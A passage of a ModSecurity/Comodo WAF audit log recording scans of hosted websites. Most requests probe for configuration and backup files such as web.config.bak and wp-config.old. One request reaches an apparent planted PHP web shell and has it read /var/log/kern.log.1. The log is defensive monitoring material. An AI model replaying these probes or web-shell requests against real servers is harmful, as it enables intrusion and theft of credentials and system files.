charset=UTF-8 --45ec4a2b-H-- Message: Warning. Matched phrase "/config/parameters.yml" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/config/parameters.yml" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.pjsglobal.com"] [uri "/app/config/parameters.yml"] [unique_id "aE3qVLhvrRrlmSOg3-9tTQAAAAw"] Apache-Handler: proxy:unix:/var/www/vhosts/system/pjsglobal.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749936724533203 1469188 (- - -) Stopwatch2: 1749936724533203 1469188; combined=1921, p1=393, p2=1404, p3=0, p4=0, p5=124, sr=94, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --45ec4a2b-Z-- --d5628e6d-A-- [15/Jun/2025:03:02:07.924632 +0530] aE3qVp4hb3-ZG-auIyDOuwAAAAg 185.177.72.108 52706 127.0.0.1 7081 --d5628e6d-B-- GET /app/config/routes.cfg HTTP/1.0 Host: www.pjsglobal.com X-Real-IP: 185.177.72.108 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --d5628e6d-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.22 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <https://www.pjsglobal.com/wp-json/>; rel="https://api.w.org/" WPO-Cache-Status: not cached WPO-Cache-Message: Page type is not cacheable (search, 404 or password-protected), This page returned an HTTP unauthorised response code (404) Cache-Control: private, must-revalidate Connection: close Content-Type: text/html; charset=UTF-8 --d5628e6d-H-- Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.pjsglobal.com|F|2"] [data ".cfg"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.pjsglobal.com|F|2"] [data ".cfg"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "www.pjsglobal.com"] [uri "/app/config/routes.cfg"] [unique_id "aE3qVp4hb3-ZG-auIyDOuwAAAAg"] Apache-Handler: proxy:unix:/var/www/vhosts/system/pjsglobal.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749936726448801 1475913 (- - -) Stopwatch2: 1749936726448801 1475913; combined=1880, p1=327, p2=1451, p3=0, p4=0, p5=101, sr=92, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --d5628e6d-Z-- --a8761567-A-- [15/Jun/2025:03:02:12.515506 +0530] aE3qXLhvrRrlmSOg3-9tUAAAAAw 3.220.70.171 37866 127.0.0.1 7081 --a8761567-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=/var/log&viewfile=/var/log/kern.log.1 HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 3.220.70.171 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36 Accept-Encoding: gzip,deflate --a8761567-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 2945 Connection: close Content-Type: text/html; charset=UTF-8 --a8761567-H-- Message: Warning. Matched phrase "var/log/kern.log" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: var/log/kern.log found within ARGS:viewfile: /var/log/kern.log.1"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "var/log/kern.log" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: var/log/kern.log found within ARGS:viewfile: /var/log/kern.log.1"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aE3qXLhvrRrlmSOg3-9tUAAAAAw"] Apache-Handler: application/x-httpd-php Stopwatch: 1749936732512086 3481 (- - -) Stopwatch2: 1749936732512086 3481; combined=1862, p1=270, p2=1472, p3=34, p4=30, p5=56, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --a8761567-Z-- --4bba6317-A-- [15/Jun/2025:03:02:14.126846 +0530] aE3qXBkoa9Lad8nP7KNzAgAAABA 185.177.72.108 37878 127.0.0.1 7081 --4bba6317-B-- GET /admin/.config HTTP/1.0 Host: www.pjsglobal.com X-Real-IP: 185.177.72.108 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --4bba6317-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.22 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <https://www.pjsglobal.com/wp-json/>; rel="https://api.w.org/" WPO-Cache-Status: not cached WPO-Cache-Message: Page type is not cacheable (search, 404 or password-protected), This page returned an HTTP unauthorised response code (404) Cache-Control: private, must-revalidate Connection: close Content-Type: text/html; charset=UTF-8 --4bba6317-H-- Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.pjsglobal.com|F|2"] [data ".config"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.pjsglobal.com|F|2"] [data ".config"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "www.pjsglobal.com"] [uri "/admin/.config"] [unique_id "aE3qXBkoa9Lad8nP7KNzAgAAABA"] Apache-Handler: proxy:unix:/var/www/vhosts/system/pjsglobal.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749936732627282 1499649 (- - -) Stopwatch2: 1749936732627282 1499649; combined=1648, p1=311, p2=1226, p3=0, p4=0, p5=110, sr=86, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --4bba6317-Z-- --bf14023a-A-- [15/Jun/2025:03:02:17.961319 +0530] aE3qYBkoa9Lad8nP7KNzAwAAABA 185.177.72.108 38036 127.0.0.1 7081 --bf14023a-B-- GET /web.config HTTP/1.0 Host: www.pjsglobal.com X-Real-IP: 185.177.72.108 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --bf14023a-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.22 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <https://www.pjsglobal.com/wp-json/>; rel="https://api.w.org/" WPO-Cache-Status: not cached WPO-Cache-Message: Page type is not cacheable (search, 404 or password-protected), This page returned an HTTP unauthorised response code (404) Cache-Control: private, must-revalidate Connection: close Content-Type: text/html; charset=UTF-8 --bf14023a-H-- Message: Warning. Matched phrase "/Web.config" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.pjsglobal.com|F|2"] [data ".config"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/Web.config" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.pjsglobal.com"] [uri "/web.config"] [unique_id "aE3qYBkoa9Lad8nP7KNzAwAAABA"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.pjsglobal.com|F|2"] [data ".config"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "www.pjsglobal.com"] [uri "/web.config"] [unique_id "aE3qYBkoa9Lad8nP7KNzAwAAABA"] Apache-Handler: proxy:unix:/var/www/vhosts/system/pjsglobal.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749936736502432 1458982 (- - -) Stopwatch2: 1749936736502432 1458982; combined=1825, p1=359, p2=1289, p3=0, p4=0, p5=177, sr=90, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --bf14023a-Z-- --4e51b23f-A-- [15/Jun/2025:03:02:19.909247 +0530] aE3qYtlaOcxgn8EdjwOwoQAAAAc 185.177.72.108 38086 127.0.0.1 7081 --4e51b23f-B-- GET /web.config.bak HTTP/1.0 Host: www.pjsglobal.com X-Real-IP: 185.177.72.108 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --4e51b23f-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.22 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <https://www.pjsglobal.com/wp-json/>; rel="https://api.w.org/" WPO-Cache-Status: not cached WPO-Cache-Message: Page type is not cacheable (search, 404 or password-protected), This page returned an HTTP unauthorised response code (404) Cache-Control: private, must-revalidate Connection: close Content-Type: text/html; charset=UTF-8 --4e51b23f-H-- Message: Warning. Matched phrase "/Web.config" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.pjsglobal.com|F|2"] [data ".config.bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/Web.config" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.pjsglobal.com"] [uri "/web.config.bak"] [unique_id "aE3qYtlaOcxgn8EdjwOwoQAAAAc"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.pjsglobal.com|F|2"] [data ".config.bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "www.pjsglobal.com"] [uri "/web.config.bak"] [unique_id "aE3qYtlaOcxgn8EdjwOwoQAAAAc"] Apache-Handler: proxy:unix:/var/www/vhosts/system/pjsglobal.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749936738403909 1505406 (- - -) Stopwatch2: 1749936738403909 1505406; combined=1909, p1=355, p2=1411, p3=0, p4=0, p5=143, sr=95, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --4e51b23f-Z-- --8cb4d164-A-- [15/Jun/2025:03:02:22.160846 +0530] aE3qZNC7wXmuvKRT4Tof8QAAAA8 185.177.72.108 47182 127.0.0.1 7081 --8cb4d164-B-- GET /web.config.bakup HTTP/1.0 Host: www.pjsglobal.com X-Real-IP: 185.177.72.108 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --8cb4d164-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.22 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <https://www.pjsglobal.com/wp-json/>; rel="https://api.w.org/" WPO-Cache-Status: not cached WPO-Cache-Message: Page type is not cacheable (search, 404 or password-protected), This page returned an HTTP unauthorised response code (404) Cache-Control: private, must-revalidate Connection: close Content-Type: text/html; charset=UTF-8 --8cb4d164-H-- Message: Warning. Matched phrase "/Web.config" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/Web.config" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.pjsglobal.com"] [uri "/web.config.bakup"] [unique_id "aE3qZNC7wXmuvKRT4Tof8QAAAA8"] Apache-Handler: proxy:unix:/var/www/vhosts/system/pjsglobal.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749936740642464 1518468 (- - -) Stopwatch2: 1749936740642464 1518468; combined=1787, p1=382, p2=1292, p3=0, p4=0, p5=112, sr=105, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --8cb4d164-Z-- --8e29cc76-A-- [15/Jun/2025:03:02:24.163208 +0530] aE3qZp4hb3-ZG-auIyDOwQAAAAg 185.177.72.108 47220 127.0.0.1 7081 --8e29cc76-B-- GET /web.config.old HTTP/1.0 Host: www.pjsglobal.com X-Real-IP: 185.177.72.108 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --8e29cc76-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.22 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <https://www.pjsglobal.com/wp-json/>; rel="https://api.w.org/" WPO-Cache-Status: not cached WPO-Cache-Message: Page type is not cacheable (search, 404 or password-protected), This page returned an HTTP unauthorised response code (404) Cache-Control: private, must-revalidate Connection: close Content-Type: text/html; charset=UTF-8 --8e29cc76-H-- Message: Warning. Matched phrase "/Web.config" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.pjsglobal.com|F|2"] [data ".config.old"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/Web.config" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.pjsglobal.com"] [uri "/web.config.old"] [unique_id "aE3qZp4hb3-ZG-auIyDOwQAAAAg"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.pjsglobal.com|F|2"] [data ".config.old"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "www.pjsglobal.com"] [uri "/web.config.old"] [unique_id "aE3qZp4hb3-ZG-auIyDOwQAAAAg"] Apache-Handler: proxy:unix:/var/www/vhosts/system/pjsglobal.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749936742698611 1464675 (- - -) Stopwatch2: 1749936742698611 1464675; combined=2073, p1=397, p2=1545, p3=0, p4=0, p5=130, sr=111, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --8e29cc76-Z-- --1b091214-A-- [15/Jun/2025:03:02:26.233092 +0530] aE3qaBkoa9Lad8nP7KNzBgAAABA 185.177.72.108 47318 127.0.0.1 7081 --1b091214-B-- GET /web.config.temp HTTP/1.0 Host: www.pjsglobal.com X-Real-IP: 185.177.72.108 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --1b091214-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.22 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <https://www.pjsglobal.com/wp-json/>; rel="https://api.w.org/" WPO-Cache-Status: not cached WPO-Cache-Message: Page type is not cacheable (search, 404 or password-protected), This page returned an HTTP unauthorised response code (404) Cache-Control: private, must-revalidate Connection: close Content-Type: text/html; charset=UTF-8 --1b091214-H-- Message: Warning. Matched phrase "/Web.config" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/Web.config" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.pjsglobal.com"] [uri "/web.config.temp"] [unique_id "aE3qaBkoa9Lad8nP7KNzBgAAABA"] Apache-Handler: proxy:unix:/var/www/vhosts/system/pjsglobal.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749936744746798 1486379 (- - -) Stopwatch2: 1749936744746798 1486379; combined=1942, p1=431, p2=1411, p3=0, p4=0, p5=100, sr=139, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --1b091214-Z-- --ea877b30-A-- [15/Jun/2025:03:02:28.224037 +0530] aE3qatAcUP5X8o425y3XlwAAAAQ 185.177.72.108 47354 127.0.0.1 7081 --ea877b30-B-- GET /web.config.tmp HTTP/1.0 Host: www.pjsglobal.com X-Real-IP: 185.177.72.108 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --ea877b30-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.22 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <https://www.pjsglobal.com/wp-json/>; rel="https://api.w.org/" WPO-Cache-Status: not cached WPO-Cache-Message: Page type is not cacheable (search, 404 or password-protected), This page returned an HTTP unauthorised response code (404) Cache-Control: private, must-revalidate Connection: close Content-Type: text/html; charset=UTF-8 --ea877b30-H-- Message: Warning. Matched phrase "/Web.config" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/Web.config" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.pjsglobal.com"] [uri "/web.config.tmp"] [unique_id "aE3qatAcUP5X8o425y3XlwAAAAQ"] Apache-Handler: proxy:unix:/var/www/vhosts/system/pjsglobal.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749936746660110 1563994 (- - -) Stopwatch2: 1749936746660110 1563994; combined=2108, p1=508, p2=1503, p3=0, p4=0, p5=96, sr=148, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --ea877b30-Z-- --632d3c07-A-- [15/Jun/2025:03:02:30.161771 +0530] aE3qbNlaOcxgn8EdjwOwpAAAAAc 185.177.72.108 47408 127.0.0.1 7081 --632d3c07-B-- GET /web.config.txt HTTP/1.0 Host: www.pjsglobal.com X-Real-IP: 185.177.72.108 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --632d3c07-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.22 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <https://www.pjsglobal.com/wp-json/>; rel="https://api.w.org/" WPO-Cache-Status: not cached WPO-Cache-Message: Page type is not cacheable (search, 404 or password-protected), This page returned an HTTP unauthorised response code (404) Cache-Control: private, must-revalidate Connection: close Content-Type: text/html; charset=UTF-8 --632d3c07-H-- Message: Warning. Matched phrase "/Web.config" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/Web.config" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.pjsglobal.com"] [uri "/web.config.txt"] [unique_id "aE3qbNlaOcxgn8EdjwOwpAAAAAc"] Apache-Handler: proxy:unix:/var/www/vhosts/system/pjsglobal.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749936748674810 1487030 (- - -) Stopwatch2: 1749936748674810 1487030; combined=1904, p1=364, p2=1434, p3=0, p4=0, p5=106, sr=86, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --632d3c07-Z-- --17d94433-A-- [15/Jun/2025:03:02:32.883735 +0530] aE3qbtAcUP5X8o425y3XmAAAAAQ 185.177.72.108 54414 127.0.0.1 7081 --17d94433-B-- GET /wp-config.inc HTTP/1.0 Host: www.pjsglobal.com X-Real-IP: 185.177.72.108 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --17d94433-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.22 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <https://www.pjsglobal.com/wp-json/>; rel="https://api.w.org/" WPO-Cache-Status: not cached WPO-Cache-Message: Page type is not cacheable (search, 404 or password-protected), This page returned an HTTP unauthorised response code (404) Cache-Control: private, must-revalidate Connection: close Content-Type: text/html; charset=UTF-8 --17d94433-H-- Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.pjsglobal.com|F|2"] [data ".inc"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.pjsglobal.com|F|2"] [data ".inc"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "www.pjsglobal.com"] [uri "/wp-config.inc"] [unique_id "aE3qbtAcUP5X8o425y3XmAAAAAQ"] Apache-Handler: proxy:unix:/var/www/vhosts/system/pjsglobal.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749936750484029 2399814 (- - -) Stopwatch2: 1749936750484029 2399814; combined=1871, p1=332, p2=1434, p3=0, p4=0, p5=104, sr=86, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --17d94433-Z-- --4bc99b14-A-- [15/Jun/2025:03:02:34.862146 +0530] aE3qcfCFSLfJixou_W0lVQAAAAY 185.177.72.108 54494 127.0.0.1 7081 --4bc99b14-B-- GET /wp-config.old HTTP/1.0 Host: www.pjsglobal.com X-Real-IP: 185.177.72.108 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --4bc99b14-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.22 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <https://www.pjsglobal.com/wp-json/>; rel="https://api.w.org/" WPO-Cache-Status: not cached WPO-Cache-Message: Page type is not cacheable (search, 404 or password-protected), This page returned an HTTP unauthorised response code (404) Cache-Control: private, must-revalidate Connection: close Content-Type: text/html; charset=UTF-8 --4bc99b14-H-- Message: Warning. Matched phrase "wp-config.old" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file 